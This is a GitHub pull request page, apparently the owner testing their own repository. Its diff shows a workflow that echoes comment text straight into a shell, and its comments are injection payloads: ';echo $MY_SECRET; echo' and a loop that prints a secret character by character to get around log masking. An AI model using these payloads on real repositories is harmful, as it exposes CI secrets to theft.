Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

hack self #1

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

hack self #1

wants to merge 1 commit into from

Conversation

efriis
Copy link
Owner

@efriis efriis commented Oct 9, 2024

No description provided.

Copy link

@efriis-test efriis-test left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";echo $MY_SECRET; echo"

Copy link
Owner Author

@efriis efriis left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";echo $MY_SECRET; echo"

@@ -14,3 +14,5 @@ jobs:
MY_SECRET: ${{ secrets.MY_SECRET }}
run: |
echo "${{ github.event.comment.body }}"

Copy link
Owner Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";echo $MY_SECRET; echo"

@@ -14,3 +14,5 @@ jobs:
MY_SECRET: ${{ secrets.MY_SECRET }}
run: |
echo "${{ github.event.comment.body }}"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

@efriis efriis closed this Oct 9, 2024
@@ -14,3 +14,5 @@ jobs:
MY_SECRET: ${{ secrets.MY_SECRET }}
run: |
echo "${{ github.event.comment.body }}"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";echo "this is after pr was closed";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

@efriis efriis reopened this Oct 9, 2024
@@ -14,3 +14,5 @@ jobs:
MY_SECRET: ${{ secrets.MY_SECRET }}
run: |
echo "${{ github.event.comment.body }}"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

";echo "this is after pr was reopened";for (( i=0; i<${#MY_SECRET}; i++ )); do echo "${MY_SECRET:$i:1}"; done; echo"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants